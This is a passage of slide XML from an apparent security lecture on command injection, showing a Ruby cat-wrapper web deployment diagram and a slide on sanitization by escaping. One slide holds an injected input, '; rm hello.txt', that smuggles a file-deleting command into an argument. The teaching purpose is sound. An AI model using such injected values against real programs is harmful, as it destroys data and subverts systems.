              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419862675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6EE0C-8F72-23CD-E74C-EB2DF53E1586}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBAA292-EA8A-B427-5711-5CA64B5D939F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361297" y="4191502"/>
            <a:ext cx="4595438" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7111"/>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33" name="Shape 433">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D885499A-E563-752B-5410-01048B5DD51A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780662" y="651402"/>
            <a:ext cx="18310303" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WWW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD65E12-AAD5-DC81-1B1D-36FCA99918E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7504BF6D-E3DF-340B-5F73-990340B27F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="4336264"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 435">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CB444C5-91F9-E926-2625-2C76FC2B39BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="4336264"/>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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5294041A-9270-BC5C-9B5F-11B3DC314F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14671923" y="8130416"/>
            <a:ext cx="4106125" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9840"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumOff val="-8741"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>catwrapper.rb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumOff val="-8741"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C10B17D-8379-4AB3-E983-3C1581151E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="3247958"/>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438" name="Shape 438">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{833D0AF6-F514-2E76-F951-369F0E496DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427265" y="4191502"/>
            <a:ext cx="4595438" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7111"/>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39" name="Shape 439">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AF863F-C29B-B634-6938-7B5EB23AC6D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="3247958"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0422C879-B31A-D75E-3C2E-D3C3F24B5ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16724983" y="7120356"/>
            <a:ext cx="1" cy="904876"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 441">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354BFAB1-CFC2-2376-CDBB-A8F40529B188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419239" y="5675717"/>
            <a:ext cx="5545523" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Shape 442">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527656EA-A7B8-DC22-4EEF-3B838AFE630F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10576076" y="4445579"/>
            <a:ext cx="139065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GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33FB34FA-BBF8-B11E-30EC-BF5084C56B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12110356" y="4445579"/>
            <a:ext cx="188531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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119EE0DD-A7D1-1A6C-C10D-C0A4F3FC1120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12110356" y="4445579"/>
            <a:ext cx="188531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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Shape 445">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292B4537-E886-88B5-672C-28F5DD8D5456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419238" y="6176240"/>
            <a:ext cx="5545524" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C216CDC-CAFC-70E6-F45D-6D94D6C72146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10794999" y="6405562"/>
            <a:ext cx="279400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i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>&lt;output&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C171F316-5D35-FC75-EDA1-1EC77E5F629B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7007036" y="10968318"/>
            <a:ext cx="9919381" cy="1498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800" b="1" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2125846973"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="441"/>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44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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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43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440"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L 0.155503 0.335500" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="444"/>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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="445"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="445"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="446"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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advAuto="0"/>
      <p:bldP spid="440" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="441" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="442" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="443" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="444" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="445" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="446" grpId="0" animBg="1" advAuto="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63AE5-4CDD-D43B-D52F-BBE3A81DD77A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Shape 478">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D469480-C4D6-F57B-1680-0EA9836A2C4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:t>: Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Shape 479">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0746E2-4DBE-F55C-FED0-8A9D2B49DDE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Replace problematic characters with safe ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>\’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>\;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>\-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>change</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Which characters are problematic depends on the interpreter the string will be handed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Web browser/server for URIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1646296" lvl="2" indent="-757296">
              <a:defRPr sz="4600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>URI::escape(str,unsafe_chars)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Program delegated to by web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1646296" lvl="2" indent="-757296">
